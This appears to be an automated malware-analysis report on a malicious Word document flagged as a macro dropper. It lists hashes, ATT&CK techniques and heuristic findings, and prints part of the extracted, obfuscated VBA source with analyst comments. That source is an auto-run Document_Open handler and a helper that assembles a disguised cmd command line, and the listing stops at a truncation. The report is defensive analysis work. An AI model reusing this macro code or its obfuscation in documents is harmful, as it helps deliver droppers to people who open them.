Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ff5fd04d482ffb3…

MALICIOUS

Office (OLE)

250.2 KB · Created: 2018-07-16 15:55:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-20
MD5: e1d08fa2afef784cc2dcf1bdf434cb28
SHA-1: f8f83df476ae0f889315b7b081e866543aefe2e0
SHA-256: 2ff5fd04d482ffb3005210613ebe70fb3ce5fb4f71ee52d2b970adf14db50abf
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, including a Document_Open macro (run automatically when the document is opened) that uses the Shell() function. This indicates the macro is intended to execute external commands or download additional payloads. In the extracted source, the Document_open routine does not call Shell() directly in the visible lines: it invokes a further macro through Application.Run with a string argument assembled from fragments and helper-function return values, which keeps the eventual command out of plain view. The ClamAV detection 'Doc.Dropper.Agent-6614044-0' further confirms its malicious nature as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6614044-0 — critical — CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6614044-0
  • VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA — critical — OLE_VBA_SHELL
    The VBA source contains a call to Shell(), which starts an external program or command line from the macro.
  • Document_Open macro — high — OLE_VBA_DOCOPEN
    A Document_Open macro runs automatically when the document is opened, without any further user action beyond enabling macros.
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL — info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source) · 53363 bytes
SHA-256: 65b49ba4d91bf241120d6f2e5135b54b466abaea735733894c24931f18d8a009
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wdNftDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes exported with the first VBA module. VB_Base names
' "1Normal.ThisDocument", i.e. this is the document's own class module, which
' is why the Document_open handler below runs as an auto-exec event.
' The module names in this sample (wdNftDs, YdvwNMUpQAUP) appear to be
' randomly generated.
' Returns Empty: the function name is never assigned. Every line assigns a
' local from arithmetic over identifiers that are never declared or assigned
' anywhere in the visible source, so this appears to be filler whose only
' purpose is to add noise for static analysis. Nothing in the visible source
' references it.
' NOTE(review): there is no On Error Resume Next here, so an actual call
' would presumably fail on division by an uninitialised (Empty -> 0)
' operand — confirm; it looks like this is never invoked.
Function fbshZptjIfCiop()
   BiHvM = 61628 - fQKCh * NWGsTi - vEtcbf * fvpfFU / KowwI / 62307 + bwGDD * PsbqO - fUzkfU * 64709 + nkbizN
   XSJiJ = 86279 - HjoDOH * CfwIbV - zEipp * miJiMr / CNwLp / 73434 + kwlliZ * dXffN - JXOfp * 38161 + AZZJq
   UmlbT = 48892 - EjsSI * wdRDZP - AcbQTd * uFobam / uJYPN / 98004 + kjYivu * zYucM - TsKVI * 81766 + OzsQrV
   zQBoi = 34038 - AFsSVP * SSoqI - ANIoXc * wYpKkn / lCRKiM / 29682 + udYMZ * XLSErU - mHMRG * 70864 + cPhihT
   UtoMQ = 52241 - vDlXi * vjtzN - EBwCG * BlloI / aVNifF / 32113 + oDwGjl * lTSzR - wVAVqi * 78176 + piHvz
   mojmSp = 62611 - BSsKQ * IKiwz - MizTWW * oKYcuH / hpqsMX / 41132 + WvmiDc * OvKqhY - oNQwE * 84678 + cqwCc
End Function
' Auto-exec entry point. Word raises the Document_Open event when the file is
' opened and VBA identifiers are case-insensitive, so Document_open is that
' handler (this is the OLE_VBA_DOCOPEN finding). The only statement with an
' observable effect is the Application.Run call in the middle; the rest is
' filler in the same pattern as fbshZptjIfCiop.
Private Sub Document_open()
' Suppresses every runtime error for the rest of the routine. This is what
' lets the arithmetic on never-assigned names pass silently; it would also
' hide a failure of Application.Run itself.
On Error Resume Next
   jHKmoH = (kRGGa - nGwNSJ * 75578 * wHKtt - blwZCf - pbqvJ + 68391 * wcrLcw) + WZKwi / akzAtu * awVhE * hwfIRJ
   twoRRu = (cfuNmM - TXTjn * 14047 * XNniU - Gtlwv - aJqzvQ + 99621 * lqFcwf) + FJUppK / VjBizq * iuwSCm * dXYQn
   zHEMv = (zojYMA - hmzMND * 50359 * KwLGV - bXVzfm - mGQYpG + 6254 * SzlIl) + jHQLk / qnLsG * EYROZ * OGvfjo
   kNfjAf = (VilPSW - bWsRjJ * 54674 * cujwS - wjbkQA - wzDdd + 22693 * KPzqz) + wYTasj / VlkzD * BYwJi * VGdZo
   DROuMm = (MFrjh - NurmTw * 18654 * rpbQDr - XEbbN - nzfusE + 36427 * dKrQX) + rsTMJ / FMcndI * qpBPIT * avMrb
' Runs a macro named "iijVoSLk" (not present in the visible source) with one
' string argument concatenated with "+". Most of the operands are names that
' are never assigned in the visible source; as Empty they contribute nothing
' to the string, so the argument appears to reduce to the literal "c" plus
' whatever the referenced functions return. DatHjiZnI is defined in the second
' module below and visibly assembles command-line fragments from Chr() values
' and short string pieces. Presumably this indirection is how the payload
' reaches the Shell() call reported by OLE_VBA_SHELL — confirm against the
' truncated part of the listing.
BkKsppA = Application.Run("iijVoSLk", "" + TQwRwME + bYojEbqCONMz + CVar("c") + HhParRtp + WQjBbwJVmkFfG + DatHjiZnI + EmXtHMkS + fuaTWwRhiB + dlzVImAOnc + CsfCDP + ETYvhRuD + CdHEAmq + vHstA + jVQvFWZAs + FOUUIZF + FJJOjQ + PiYXpSYu + qZnoI + OKIwLOHsF + BOlwzVKr + ablIASYpN + VZlEdt + YBkfRjJ + ViwfLbqiNK + RIbwam + XJJQCDc + kXiwDvn + TPASCaspE + kpuPBiAcN + PbUzYs + aFPNEdIEsY + qrwZzjVrPE + ZvwvXRPCiHEaEu)
   dMojUj = (AiQiX - BDfzdN * 16744 * dbQYaV - iscop - lnYOW + 18706 * jwBQG) + BXwbO / jwzlY * tKSRp * qhOPQG
   HNjZu = (siDvjW - jVUMk * 61802 * nGAmjE - MBlAFh - EsvUD + 76718 * KtLCP) + dMSUV / wPANzq * fjhSvd * DbdZsj
   DXcno = (zvOSJq - jBJmmo * 20869 * jLWIus - nWVCEz - sbzGiw + 5889 * EIYUzG) + nRGUbT / GftwQ * szHml * JhmjGO
End Sub
' Filler function in the same pattern as fbshZptjIfCiop: five locals assigned
' from arithmetic over names that are never declared or assigned in the
' visible source, and no return value set (the function returns Empty).
' Nothing in the visible source references it.
Function zCiZzSV()
   iHJNwM = (BJbGt - KFWXiG * 54871 * QrKzN - LzXYW - ClwjrO + 40512 * KPGvUJ) + bQVkNL / RPzQlK * EmDjv * ZIqjT
   KhsnlR = (wqQjaB - DrvimO * 23618 * SYssk - CYNTwz - HjuRk + 86721 * bodwfY) + MINzj / KOTus * nuSDPi * rvKAR
   vBlOcD = (kjBnJn - Thjac * 20673 * FcDLZk - SapQc - sQdlo + 65381 * SYkPaH) + FbJFq / RpZiCC * XSFMW * XWDDvl
   skMdK = (EwzAwt - QozVO * 13167 * MYjVY - AHmaSw - YiIMcv + 75629 * SqZLL) + nskQrq / wTDqEN * wMZhBO * mjntTT
   kRNVGX = (BzDdzs - INaYq * 73564 * rsHPl - UMZsYr - hYbUbr + 56619 * HjdEE) + WMYtih / sYFGU * RpaKEH * jklFz
End Function


' Start of the second extracted module: the olevba preview appears to
' concatenate all modules, so a new VB_Name line marks the boundary. Its
' DatHjiZnI function is the helper referenced from Document_open above.
Attribute VB_Name = "YdvwNMUpQAUP"
Function DatHjiZnI()
On Error Resume Next
mRAZjX = (94712 * 1988) - (WIVQJ / 20470 / 80375 * zWLKbd)
   hjajb = (33868 * 92526) - (zhhcbj / 15135 / 59274 * SjQcq)
   USCzH = PDHDul * DCqKB + TwBjoz - UCWjt / qivEt - bDzzX - 67654 - SsJQT + 20764 / zdJTiN + 3866 + VMjXKp * uIzwCa - TwdAQf - LlDYwH / UcVfG
BZCpdNo = CStr(Chr(KSXiIDdbGPCKNK + zBrWiXRBTYMC + 109 + BDIlLWvdcltPnQ + hGtNUHkwUnAV)) + "d " + "/" + CStr(Chr(qaGHNzBbwunW + cOjAHmq + 99 + GduSKRYW + suTIfCufG)) + " " + "fO^" + "r ,  " + "/^F ; " + ", " + CStr(Chr(awifVFDzNctkRz + hrJaYNHjKJ + 34 + wNGjzKj + noMUWLmw)) + " de" + "li" + CStr(Chr(IBjNowh + qCUMzzBA + 109 + mHTwHtCz + CVhBHzC)) + "s="
nhjcXL = (76785 * 3720) - (BrWUr / 9828 / 23424 * RbcMHQ)
uRwsPLw = "zWef " + "tok" + "ens= " + "+1  " + " " + CStr(Chr(RmQjToJ + MVULRoXupCb + 34 + zcYKVVTECznz + WXzJwaakjh)) + " ;" + "  %" + "^F"
tYdhZ = (60672 * 32097) - (vWCrU / 58471 / 19593 * GbCVz)
   Iwhir = (53208 * 31801) - (okMJbW / 88272 / 51872 * fQHpb)
MCBabRPlzlG = " ;  ;" + "  in " + ", ,  " + "( " + ",  '" + "  ,  " + "," + " F" + "TYP" +
... (truncated)